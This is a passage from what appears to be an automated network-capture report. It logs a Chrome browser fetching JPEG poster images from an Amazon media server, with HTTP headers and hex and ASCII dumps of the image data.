                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 5d e2 8f 39 26 bf ee ac 3f d2 be 09 a7 40 7b d4 ef a7 e2 a7 6f c8 c7 1f e1 53 7e 9b fb 60 6d 92 3f 4f dd 49 1d 47 27 18 d6 9b a9 4b 31 d2 b2 ab dc d8 7f 3e 6b a9 44 21 97 b4 72 6c c0 34 3f a6 ae 2b cd 71 77 a9 af 1e 6f 90 c6 a0 b9 c9 c1 91 73 de 90 16 6d 00 61 07 bd ad 6d 4c db c8 6d 87 3b a2 f8 75 28 74 63 25 7d 50 26 ad c7 29 c1 46 3a d4 5e 16 34 3b d3 0c 64 d1 c0 46 72 23 59 13 73 75 1f 17 be 82 f6 26 ac db 28 be 9f ba db 1e da ba 90 46 cb c0 b5 23 e7 5d ad 67 10 b0 66 be ba f3 06 94 6d d8 05 f8 ab e3 ee 00 57 4e b4 80 c5 c9 2f 51 86 04 2a 61 85 f3 83 56 e3 e7 59 ba 69 76 5a 95 96 da d9 80 b2 8c 2c 51 62 4b fe 3c e6 f7 a9 f9 80 14 7c f8 5a a0 81 49 28 dd aa 1a 51 50 f6 26 92 a5 ed b5 5c 91 c5 2d 5b 49 19 0b 57 8f b8 a4 ee 05 5b 47 c7 1a e4 fa 1e 55 8c
                                                                                                                                                                                          Data Ascii: ]9&?@{oS~`m?OIG'K1>kD!rl4?+qwosmamLm;u(tc%}P&)F:^4;dFr#Ysu&(F#]gfmWN/Q*aVYivZ,QbK<|ZI(QP&\-[IW[GU
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: c7 65 bd f8 d8 78 fd fe c2 a0 5c e2 a5 9d 21 ee f2 f5 a4 1f c7 37 50 96 5f 9e 95 fc 0b fb 33 f4 c8 a6 0f 56 1d 18 c6 db 4d e1 3c 0d 25 08 25 5e d5 e5 5a 92 d7 07 26 88 cd 18 14 d7 97 4a 36 e9 43 c7 ef f6 ba df e5 1f 8f 48 fe 0f d8 77 11 82 cc b2 ab 27 25 0e b1 20 39 37 57 9c 08 8f 56 97 42 e4 16 1f b2 3c 7e ff 00 6b ad fe 51 d5 9d 9f 98 12 78 5a 5e 35 b4 24 8b 0b d3 70 1c 9e 46 c9 22 29 92 dd 11 24 c8 c6 6b fa 8c 14 f7 91 46 75 69 6e 16 28 f9 2a ee f1 ae 4f 7b 4e a0 8c 04 2d 15 a4 72 b6 07 5a fc 23 15 d2 97 10 0f da 1e 3f 7f b5 d6 fe 63 ab 2b ef 2b bd 67 e6 ad 53 78 2e 05 58 cd a2 5c 55 94 7b c8 29 89 62 58 f4 77 3c 85 28 fd f8 59 06 97 92 15 91 38 d9 94 c3 d3 da 3c 4b 56 ff 00 9a 57 5b fc 63 ab 15 d6 18 ff 00 68 78 fd fe d7 5c ff 00 c5 56 f6 72 5c 02 52
                                                                                                                                                                                          Data Ascii: ex\!7P_3VM<%%^Z&J6CHw'% 97WVB<~kQxZ^5$pF")$kFuin(*O{N-rZ#?c++gSx.X\U{)bXw<(Y8<KVW[chx\Vr\R
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: b4 24 58 86 6b 28 35 15 2e 83 7c ec a0 ad 79 75 ce 69 91 1d b5 2a 89 23 39 ad 51 a3 da 8b 21 fc c3 47 da 8d c2 e3 7a 73 1e 6b cb c7 8c d7 02 30 5a 10 28 ce 0d bc 7f 66 dd 4f cb 40 af 46 15 72 4d 69 1d 61 00 65 ad 22 a1 14 5e da 51 18 3d 95 75 18 14 3c 7e e8 4a a7 34 f8 60 45 70 27 df 94 5f a4 81 4f c2 a2 ef b0 e0 41 d8 f1 ed 9a 65 57 09 5e 5d 40 50 25 8c 7b b7 22 3f f6 64 49 18 9a 01 62 2b 4b a4 7d ea 25 f6 14 a6 81 5b 1b 34 51 e6 82 26 35 ad 13 bb 86 74 20 8a 58 55 8e 00 80 00 d5 e5 d3 52 b4 61 51 bd 2d ba 8c 51 8c 23 ef 46 34 c6 6b 8e 3c 35 6c ab 9a d2 38 f5 21 78 c3 66 bc ca 52 38 71 90 2b 1e 1f 74 e6 21 f2 2d 94 fc 68 b1 b6 6a 25 40 7d a2 05 42 1a 8d a2 67 35 e5 97 00 52 db aa fc 35 a2 e2 80 8d 54 2d 3a c5 80 8d c5 11 24 57 e9 29 a7 86 22 4e c2 38 e6
                                                                                                                                                                                          Data Ascii: $Xk(5.|yui*#9Q!Gzsk0Z(fO@FrMiae"^Q=u<~J4`Ep'_OAeW^]@P%{"?dIb+K}%[4Q&5t XURaQ-Q#F4k<5l8!xfR8q+t!-hj%@}Bg5R5T-:$W)"N8
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: a0 7c 87 83 17 c4 47 e5 3e 5b 29 16 21 46 7d 0a bd 42 a9 ff 00 31 4d 6b 59 6f 4d 52 72 a9 e9 68 a3 69 6d 02 3d 82 d3 ff 00 36 be a9 b2 27 a7 22 23 56 bf 21 e0 c5 f1 11 f9 4f c1 3c 18 be 22 3f 29 f8 27 83 17 c4 47 e5 21 22 0b 3b a1 84 fd bd d0 b1 e9 31 2c 09 b0 4d c7 05 61 72 03 2c 24 e3 74 a9 8e e0 a6 d7 ff 00 0b 1e ae 21 24 d9 88 aa 3a a6 2b 92 15 65 4c 4f 23 26 ba e2 b6 50 10 be 22 3f 29 0a 83 d8 ed 58 4a 0e f0 ba 90 d9 c2 77 13 7a 42 cb 80 67 51 32 5a 02 bd 9a 7d bc 93 2c da bb 54 6f 05 44 17 90 50 c0 c7 b1 88 a0 9c 9e 8a 63 10 8e d1 7c 56 3f 29 ec 46 46 21 a8 11 89 d0 1d e0 4c 12 60 d3 a8 9d 0c 8c 4e 88 82 91 89 d1 1d a3 e9 95 c9 2d f0 8b 92 4f c2 ae 08 83 4e 00 02 04 c7 b1 e0 c5 f1 58 fc a7 e0 9e 0c 5f 05 96 72 9f 82 78 31 7c 56 58 8c c0 14 cd f3 37
                                                                                                                                                                                          Data Ascii: |G>[)!F}B1MkYoMRrhim=6'"#V!O<"?)'G!";1,Mar,$t!$:+eLO#&P"?)XJwzBgQ2Z},ToDPc|V?)FF!L`N-ONX_rx1|VX7
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 6c f9 d4 72 49 c9 3e 4d 0f 7c 95 ca b0 60 b7 ac ac 5a be 7b 65 49 69 f5 00 a1 f8 a4 8e 72 47 10 20 96 06 f4 9a 37 ae 49 35 f3 9b 0c 04 5c 46 48 42 84 fe 56 4d 2a 07 f2 92 12 ac 4d fb 16 2d 4f 31 7f 3c 8f 93 43 df e9 7b a1 ef f4 8f 9a 04 0c e7 b6 bb 6b b6 bb 6b b6 b6 ae da da b6 ad ab 6a da b6 ad ab 6a da b6 fd 5f ff c4 00 41 10 00 01 02 04 01 08 09 02 03 06 06 03 01 00 00 00 01 00 11 02 21 31 41 51 10 12 22 61 71 81 91 a1 03 20 30 32 42 52 b1 c1 d1 e1 f0 13 62 f1 40 50 53 82 92 a2 23 33 43 72 b2 d2 60 70 c2 e2 ff da 00 08 01 01 00 09 3f 02 ff 00 cd fc 26 7b 22 92 ee c6 fc 21 ee f1 f7 4c ff 00 87 11 2f b5 d0 a0 86 4c 4b bc eb 64 cd f8 8d ad 60 6d 9d cb dd 33 40 06 b7 96 75 53 30 8a 10 df ee 6f 95 5c f6 70 35 67 51 48 e9 4d b0 6b 6f 4d dd 8d ff 00 94 e6 f3
                                                                                                                                                                                          Data Ascii: lrI>M|`Z{eIirG 7I5\FHBVM*M-O1<C{kkjj_A!1AQ"aq 02BRb@PS#3Cr`p?&{"!L/LKd`m3@uS0o\p5gQHMkoM
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 77 83 ab 64 c7 aa 6a 8e 2a e3 86 4d 23 8d 95 d1 ea d6 2e 4a c4 20 af 70 be 54 c4 64 6e 75 40 3d 3a 94 58 d7 64 f2 5d 53 26 19 3b b3 3c 54 a4 a5 9b 65 65 88 ea d0 0a 29 2a 12 cb bb ea 83 32 ba d1 10 d4 ad 2d 78 a1 3e 2a 52 7d 97 53 73 47 52 36 55 99 28 e5 3a 26 9a b2 50 d3 2d 4a d5 cf ad 43 c9 09 f2 3f aa 34 fb e2 39 aa 94 36 ea 5a ba d8 45 e8 bf 2f c2 93 33 b6 b0 8b 85 13 c2 45 2f ac 29 40 f2 02 41 10 1a 9a d7 14 1a 4d 9a 2e 8b 8c 75 9d 6a 99 21 41 b2 59 17 10 dd 78 0f 52 c3 af ea a8 6c 85 b8 2c 3a d8 2a 88 4a 0f 9c ec 14 42 12 5a 58 5a 6a 1a 40 d2 98 3a d0 cc d7 44 64 2a 54 42 93 0a 39 fd f7 54 54 b5 6a a1 91 46 6a cc ea a4 99 95 6c 95 1d ef 95 55 e2 aa b6 4a 67 04 31 ec 6d 5b 2d 6a fd 7a 89 39 aa 9e 74 1e ea 71 74 6e 37 2f e5 e8 d4 3d ea 0c 11 50 38 88
                                                                                                                                                                                          Data Ascii: wdj*M#.J pTdnu@=:Xd]S&;<Tee)*2-x>*R}SsGR6U(:&P-JC?496ZE/3E/)@AM.uj!AYxRl,:*JBZXZj@:Dd*TB9TTjFjlUJg1m[-jz9tqtn7/=P8
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 43 2b 20 73 62 83 6c d0 d3 81 09 e9 49 09 e6 d1 40 49 06 19 61 d9 95 36 6e 6b c3 0b ed aa df c5 82 bb d8 d8 3d 15 88 fb 7a 2b fd 7e 15 df 92 6d 2d 47 6a 1f 40 ce 3e 15 b3 75 d6 47 82 a0 cc fe e2 c8 52 13 c6 aa fe ce be e4 0a d5 ab 6f 05 43 cf 24 48 a3 f6 11 fb 28 a8 91 b2 b7 c6 75 69 b9 5e 28 87 07 42 84 7f fa e0 85 3e 43 71 05 79 33 8a f3 37 74 9c 78 ab 8e c2 e9 f5 ce bb 55 db fb 69 c1 59 fe 10 2c d4 77 d5 ec ac 21 9b d0 53 92 79 e7 1c 69 f2 9d ad 3c 5b fe ca 09 09 7f 4e 90 0a 0e 62 e7 9c f2 0e f3 cf 66 8a 05 c1 d8 f2 6f a2 12 67 6d c8 17 10 c7 52 f2 bf 14 e3 41 db fd b8 ec 50 fe ac ea 12 65 8d 80 05 53 6a a0 d6 be ee 86 4f b6 57 fd 11 b9 f1 71 54 9b ef 57 cd 1c 28 8e cd 24 6f 47 eb 9a 6e 45 45 5e 38 a8 bd d4 4f 3f aa 8a fb 3e e7 e8 a2 e4 df aa 8f c2 c6
                                                                                                                                                                                          Data Ascii: C+ sblI@Ia6nk=z+~m-Gj@>uGRoC$H(ui^(B>Cqy37txUiY,w!Syi<[NbfogmRAPeSjOWqTW($oGnEE^8O?>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          41192.168.2.1649760151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:58 UTC429OUTGET /images/M/MV5BMDVkMWVmMjYtNjE3YS00YWIxLWE5MDgtMWUzMTIyYWJhMzA1XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:59 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 34829
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 835b4a77-1023-4496-98c3-351ee5c6ac16
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 29 Mar 2018 21:15:11 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 08 Dec 2044 01:06:16 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 210702
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:59 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200102-IAD, cache-nyc-kteb1890039-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c7 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 06 07 04 05 08 03 01 02 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec bf 9f 40 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5@
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1364INData Raw: 26 b5 4c 6a fb 14 26 da e5 14 9e 1d f0 21 b1 1b 80 50 7b fb 74 52 12 8b 1b e8 31 4c 9e 3b fb d2 d9 f4 6e b6 8a da f8 ee 78 9b 3b ac f2 ec fc 59 66 bc 41 30 00 00 28 0b fd 13 fc ba e8 4e 8d e2 fa 74 77 ef 28 d2 fd 5f 34 90 59 d4 14 02 6b d7 88 6c ca d4 04 00 00 f0 4f 35 c8 74 30 1c 7a 6f ea 2a cf bd ef 4d 76 de 86 e7 b8 9b 7a af b7 fa 42 2d 16 95 1a f3 02 00 00 00 00 02 a7 e7 1e e6 56 ff 00 cd bb 87 af 2a 48 bf 36 ec 66 90 28 bd af 35 e6 bf 54 76 74 87 87 3e cd 7b 46 b0 a3 7f 66 d6 35 b2 fc d7 59 be 7d 4b 62 d6 62 50 9e c2 9f de 9c e3 d0 59 8b 62 16 a0 00 00 00 00 08 31 39 44 71 89 ba b3 80 1d 16 a2 74 c7 47 fc ac a1 25 f9 91 51 c8 89 d2 0b 92 4c 55 ce 71 38 d4 60 7e 22 79 56 cf af f4 b8 f5 dc 77 d7 2d f5 26 dc bf 44 d4 00 00 00 00 00 7c fa 0d 27 8d 6f 20
                                                                                                                                                                                          Data Ascii: &Lj&!P{tR1L;nx;YfA0(Ntw(_4YklO5t0zo*MvzB-V*H6f(5Tvt>{Ff5Y}KbbPYb19DqtG%QLUq8`~"yVw-&D|'o
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 6b 95 73 8a ea 43 67 6c 8d de a7 ff 00 44 2a ac 58 55 da 1d 36 b6 9e 7a 77 29 53 4e 90 2e e7 bc d6 dd fb 43 eb 5f 0f c1 99 24 97 f0 e7 1b 5a 81 0a 17 22 5c 9c 53 dd 6d 2c 2b 9b bd 6f 2d 12 90 a1 d5 8e 5e 02 cc d4 91 30 39 a7 b6 56 0f 4c a8 c4 d3 90 98 cf 32 2f 7a 17 08 4e da 5f f6 2a dc e5 de af d5 c4 ee 24 ac 55 9e a3 25 a7 b6 cf 50 8e ec 79 3f 9a fb 53 92 c6 50 1a d7 57 b7 9f b0 ab 85 ca d3 a9 65 65 0d 0f 9b 78 68 87 72 42 2f 83 4e a3 06 8c dd f6 8e a7 75 44 ec 72 1a 28 b6 31 34 96 98 35 d2 2e 49 ad 98 24 d7 b4 b1 36 27 91 b7 56 bb 6f d9 66 1e 06 91 8a 10 cb a6 6a dd 4f d3 93 f9 75 3b 3e ae 16 4f 0b 7b e9 ad be dc 3f 11 6e 1b 66 82 64 b8 dd c7 1c b9 16 ef 50 47 d8 a9 16 cc 7d 51 58 6d a5 b7 51 93 5d 2a 1e d5 d9 7b d7 2c 68 28 cf dc d3 dc 12 8c 52 59 08
                                                                                                                                                                                          Data Ascii: ksCglD*XU6zw)SN.C_$Z"\Sm,+o-^09VL2/zN_*$U%Py?SPWeexhrB/NuDr(145.I$6'VofjOu;>O{?nfdPG}QXmQ]*{,h(RY
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: b4 57 c4 03 30 a5 68 c7 36 d1 f8 ea 67 16 d3 78 7c 3e be 69 8f c9 f1 08 fd b7 86 81 fd af 0f 88 1b 16 ad 5a 68 c5 b5 bd 36 70 70 77 f7 c4 d6 3b db 7d 0b 07 e3 78 e8 e9 db 43 ec 5d 3d 86 49 1a 5e dd a2 85 9f 1c a1 d2 3d 34 c4 9b 43 5a 33 c2 23 69 ac 3b 62 27 b0 2d 23 3d 0b 47 21 03 47 62 46 cd c2 d0 ac 11 44 3f 4f 7c ab 54 9a 7b 3f 35 4d 61 9d bb 3a 26 de 64 a5 d3 b6 0d a1 6d 8a 4c f2 78 6b ff 00 60 56 85 fd 61 e3 ad 3e db 66 ac d6 80 98 89 db e4 d6 93 7d a4 de 1a 23 6d bb 8b c3 e2 11 9b 53 5a 69 cd b4 15 77 7b c0 f1 ad 75 93 0e f5 05 cb 98 a5 26 7b b7 44 42 0d f4 84 29 5b a9 24 8a 1d eb 25 dc 91 96 5a 7b d9 00 dd 57 73 18 53 70 6b c9 49 c2 cd 7f 2a 19 70 25 90 43 23 98 ee 64 e6 0a d2 4b 2a ca c2 8d fc bb 6a 47 91 61 c8 6d 46 45 47 61 d5 38 6c d7 55 2a a2
                                                                                                                                                                                          Data Ascii: W0h6gx|>iZh6ppw;}xC]=I^=4CZ3#i;b'-#=G!GbFD?O|T{?5Ma:&dmLxk`Va>f}#mSZiw{u&{DB)[$%Z{WsSpkI*p%C#dK*jGamFEGa8lU*
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: d5 bd 75 0f b8 0a 37 12 b5 73 c8 43 54 17 07 be fb e9 3e 8b 62 d9 44 7c 4b 53 69 9c d8 d9 f0 db 6c 7b 88 ab 1f 89 bc 0a 2e b5 ca 94 64 51 eb 24 c9 17 bb ae 82 84 a8 57 7d 75 11 d7 55 15 75 51 0c 54 97 11 c3 ef fd 4a de 96 e6 37 52 e3 ad 82 a6 9d 24 f2 be a0 50 6f e2 95 f1 6f c8 34 61 8b eb af c4 bc b7 ea 10 29 86 d5 53 97 37 08 21 92 45 1a 8c 08 b6 51 63 44 40 f7 1d ef 66 32 4b 21 37 96 11 c3 6c 92 8d 0d 88 9f 02 f2 31 14 d2 2d 5c c6 bf a7 25 68 8a 0d c5 5e e7 9a 5c cd 63 12 d9 ac c3 43 7c 5c 11 57 78 8e 49 96 9b 46 5e 9f 78 7e e4 d6 3f 6a db b4 21 89 25 63 fa dc d2 38 58 64 d6 6e 2d df 6c b7 77 ed 14 29 3c 69 ab 5c c8 4a a6 99 76 f7 48 e5 ff 00 02 ff 00 b4 f3 56 a6 7f 64 2b e1 f3 f5 d8 55 ca fd 49 ab 50 fa 96 49 5a 2f f6 52 af 8e 2e 65 cd cf 97 4e 1b 74
                                                                                                                                                                                          Data Ascii: u7sCT>bD|KSil{.dQ$W}uUuQTJ7R$Poo4a)S7!EQcD@f2K!7l1-\%h^\cC|\WxIF^x~?j!%c8Xdn-lw)<i\JvHVd+UIPIZ/R.eNt
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 63 47 ce e6 f1 9c 90 8c 41 9a 43 9d b1 ca 5c 17 12 ca d1 a2 b5 45 ef 96 ad ad f3 6b 13 b6 de cd be d5 c2 99 b3 6c 39 65 91 ea e1 9a 0c 3b 42 e5 4c 61 a2 cb 28 cb 48 de 86 4f ac 2c f3 0c 23 f7 71 d0 5d d1 58 66 68 83 4b 0a 08 fe c0 7a 50 bc 80 0f fd 78 72 a1 1a a4 c0 36 d8 00 af 2c 02 5f a7 ca 1e ed d6 4e 49 2a 43 0b f0 2c 76 68 31 b4 c9 6d 1c 6a a1 5c 1f f7 3b a8 e9 5a 9b bb 75 15 3b 72 72 4a b3 5c 23 3c 2e 2e 66 8a 61 b6 48 37 f1 a7 27 c8 b6 e8 b8 c7 4b 1d 1b 74 0a 45 06 c6 70 80 60 46 0c 08 71 4f 6d 1b e3 74 96 90 c8 72 ec 81 bd 78 d6 b8 d6 99 00 f4 ff 00 aa de 17 d5 96 27 f2 11 c3 16 30 24 8c 6e c0 8d 30 30 14 0f 4d a3 d6 9b 23 da 5d c7 7a 69 b0 71 42 7f fb e5 5c ed ae aa 3c 6e f0 dc 2b 78 a7 97 8f b9 e5 39 db 5d 40 18 2d d4 2f 7a 4b 84 7c 6d f1 73 85
                                                                                                                                                                                          Data Ascii: cGAC\Ekl9e;BLa(HO,#q]XfhKzPxr6,_NI*C,vh1mj\;Zu;rrJ\#<..faH7'KtEp`FqOmtrx'0$n00M#]ziqB\<n+x9]@-/zK|ms
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1343INData Raw: 18 4a cb dd 9c b1 2c 7d 01 ca 9c 81 2a 48 30 c6 26 8f eb cb 0d dd 08 23 ef c4 7d 8c b2 e7 b6 bc d5 8f b4 4b 49 df dc e6 ca 44 38 c2 58 93 93 eb 59 d9 75 e7 a3 7e b9 a1 ed a3 0c 67 eb c8 5d 08 a2 1a 06 31 f9 fd 76 d0 b6 13 b4 6f 3b bf eb e7 5f d0 d7 75 1c 83 31 3d 8f c2 11 38 64 cd d2 69 0b 54 1a 4e 87 e7 7d e9 e9 ba 5e bc 94 66 bb 56 7e 95 8a 15 a6 e1 3a 26 36 dc 1e 96 9f a6 6a bd 3b 16 ab 4b d3 54 ab 24 12 4c 63 e2 cc 82 0d 9e c5 b6 93 c9 93 a7 2d c6 61 06 7d 8a cd 64 2f 2f c1 3d 58 64 5d a5 e5 8b db be 5b d5 10 7f c1 ee 23 57 ca 18 76 76 d5 99 ec 57 de a7 9e b5 da dc a9 49 7e 85 fa d5 a4 a5 b7 79 cf 9c 3e b6 af f4 b7 25 d3 77 a3 b2 93 bf d6 55 bb 3c a3 e0 b3 bf d4 95 76 f5 09 d5 d5 17 74 92 d6 86 f7 4a ae dd 66 a4 2d bf d1 b3 05 15 95 7a c2 b2 ee 93 5a
                                                                                                                                                                                          Data Ascii: J,}*H0&#}KID8XYu~g]1vo;_u1=8diTN}^fV~:&6j;KT$Lc-a}d//=Xd][#WvvWI~y>%wU<vtJf-zZ
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 77 90 71 37 29 c3 10 2f b2 45 f8 27 b9 d8 31 bc 4b 7b 7e ca 29 11 47 d4 7b a2 2d b1 94 9c 83 2b 88 6f 10 e8 bb d4 50 52 ce da 49 33 9b 9e 67 db 72 54 10 92 f6 5a 43 38 b7 7e b5 8d 78 77 da 64 d7 6b b2 f1 58 9d 3d 85 d4 25 f0 a7 af 4d 23 ef 1e 9d cb af 3f 2e 4a 51 5d 15 e1 0f 23 b3 a0 b1 14 2b 48 69 0f 78 fd 99 60 14 a0 ba 1f 3f 72 f8 2e 03 f5 7a a8 f0 69 60 e3 c5 53 07 dd c5 42 2f d7 ac f3 45 1f 72 f3 1c 54 25 ee 18 d4 eb c1 37 5b 7d 9b b5 18 ae aa bb 56 04 8c 0d 64 6f 58 41 9b 71 30 97 9a b8 c8 b9 3c ae cd 92 9e 96 eb 58 6c 69 60 be f7 ea 99 e7 c1 75 7f fd 73 57 45 d1 5b 95 dd 1c 6f 0b f7 e8 de 31 0a 87 ec 64 02 94 10 e8 8f 12 8a 2a 42 2e 3b f6 a3 a5 10 1c 55 ca e1 2b c9 93 cb 1c 3c 51 3b 76 17 1d 9a 83 aa 8a 46 c9 d7 5e fd 69 a7 75 d5 27 c5 1a 5e f3 d7
                                                                                                                                                                                          Data Ascii: wq7)/E'1K{~)G{-+oPRI3grTZC8~xwdkX=%M#?.JQ]#+Hix`?r.zi`SB/ErT%7[}VdoXAq0<Xli`usWE[o1d*B.;U+<Q;vF^iu'^
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 7a 77 eb 3d e8 c8 c4 ff 00 a3 e8 f6 6b 75 67 36 12 28 e0 b8 02 63 c1 19 08 8e 6c cb 38 b2 c0 f3 46 70 58 df 61 10 4f d6 3d 40 cf 20 e3 73 6f 44 0b 70 c6 25 7d a9 4c 52 58 de ae 24 cc 92 ee 2c d5 dd 1c eb 4f ab 42 c7 b3 b9 47 2f a9 af fd a3 e2 02 6c e3 ad e8 21 d9 77 47 6c 2c 62 ef e9 bc c3 df d1 d6 8b bb e0 b8 3f 02 fd 17 da ee e8 ed 42 bf 87 07 72 be bc 44 3e 2f b9 59 36 a2 cb 00 29 a1 69 a6 ff 00 76 7b 56 94 0f 2b 36 5a 4f 30 e7 91 4d 3c 9c 67 78 0e ba d9 46 6b 39 c3 34 c5 30 e2 66 bb 0a 21 c5 5e 1f 55 36 fa 29 b4 b3 cb 1b d3 08 44 59 57 2c ed 62 2b 22 f7 12 be 6b b5 07 ea 88 42 87 5e 31 a3 68 c8 3f 68 26 cd b7 77 66 1b 55 7c 6e f2 55 00 b6 6d 9b b0 72 a5 09 a4 b4 b3 5e af 23 a8 a2 18 40 4e 8c f8 bf 82 0d 9b 90 bb f8 91 59 37 ad 39 6a a9 da cf bd 67 36
                                                                                                                                                                                          Data Ascii: zw=kug6(cl8FpXaO=@ soDp%}LRX$,OBG/l!wGl,b?BrD>/Y6)iv{V+6ZO0M<gxFk940f!^U6)DYW,b+"kB^1h?h&wfU|nUmr^#@NY79jg6
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 64 04 dd cd 33 8d 56 77 dd ea fa a2 21 1c 10 7f bc 64 38 57 b9 3c 71 5c 3c 85 cb f2 0f 12 83 01 77 c8 e6 1c 45 38 21 6c 6a af 0f dd 44 60 3d 9f f8 95 92 11 8f 77 2c a7 d1 fd dc a0 97 e6 9f 8a 8a dc 3a 8f d3 43 fe ee e5 90 3b 9c 72 3e 6a 2b 3b 47 ee b2 b0 fe 61 d1 18 1b 4a 78 f6 0f 36 50 88 7f 59 f7 c5 13 67 08 8b 70 83 d1 0c c8 6a 07 52 ff 00 dd 66 11 86 8c 5b a9 3c 53 41 b2 b3 da a1 31 fd e3 e6 54 5b a1 f3 50 b7 ca c2 22 da 1d 3c 1b 0f 9b ac a0 3b 43 79 a8 44 5b 0f 9b 28 63 1b 22 f2 2b e9 78 95 f4 9f 99 bc 50 fc d1 bf 9a fd 21 fb cc 0b fc 31 8b 5c 59 41 dc 08 ef 50 58 18 42 61 83 ba 68 06 00 df 34 5a d4 51 cf 5b a8 5e d4 51 1c 2c ea 50 83 14 40 17 ad 7e 5a f4 51 45 44 18 d0 bd 5d 1a f8 28 c1 7a 4e b7 fd 84 c5 af ee 57 45 e0 9b 34 68 de 0d f3 f9 3d dc d3
                                                                                                                                                                                          Data Ascii: d3Vw!d8W<q\<wE8!ljD`=w,:C;r>j+;GaJx6PYgpjRf[<SA1T[P"<;CyD[(c"+xP!1\YAPXBah4ZQ[^Q,P@~ZQED](zNWE4h=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          42192.168.2.1649761151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:58 UTC429OUTGET /images/M/MV5BMGJhOTk0NjEtYzcxNi00ZjQwLWE0ZDItMGZhMGYzMTRlMWZhXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:59 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 31447
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 2449f801-175b-44ed-9dbd-932e30330803
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 13 Nov 2023 23:48:49 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
